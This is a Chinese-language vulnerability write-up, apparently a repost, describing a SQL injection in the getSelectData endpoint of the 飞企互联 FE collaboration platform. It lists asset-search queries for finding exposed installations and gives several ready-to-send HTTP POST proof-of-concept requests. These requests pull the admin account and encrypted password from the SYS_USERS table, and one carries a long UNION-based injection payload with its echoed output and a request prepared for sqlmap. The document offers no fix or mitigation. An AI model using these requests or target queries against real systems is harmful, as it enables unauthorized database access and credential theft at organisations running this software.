登录 白背景

飞企互联FE业务协作平台getSelectData存在SQL注入漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台getSelectData存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 飞企互联FE业务协作平台

三、资产测绘

  • hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
  • 登录页面

image.png

四、漏洞复现

通过如下poc可查询管理员账号及加密密码

POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01%3D%27admin%27

image.png

POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01='admin'+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2874%29%2BCHAR%28108%29%2BCHAR%2879%29%2BCHAR%2865%29%2BCHAR%2889%29%2BCHAR%2867%29%2BCHAR%28120%29%2BCHAR%2868%29%2BCHAR%2899%29%2BCHAR%2876%29%2BCHAR%28111%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28104%29%2BCHAR%28117%29%2BCHAR%28121%29%2BCHAR%28118%29%2BCHAR%28101%29%2BCHAR%2873%29%2BCHAR%2871%29%2BCHAR%28100%29%2BCHAR%2875%29%2BCHAR%28115%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%28101%29%2BCHAR%2878%29%2BCHAR%2875%29%2BCHAR%28112%29%2BCHAR%2881%29%2BCHAR%28105%29%2BCHAR%2890%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%2897%29%2BCHAR%28117%29%2BCHAR%2869%29%2BCHAR%28105%29%2BCHAR%28115%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+ayHW

image.png
回显

qxxvqJlOAYCxDcLoqUhuyveIGdKsFxeNKpQiZkvauEisHqxkjq

sqlmap

POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01%3D%27admin%27

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/zq4t3hh672ruqtx2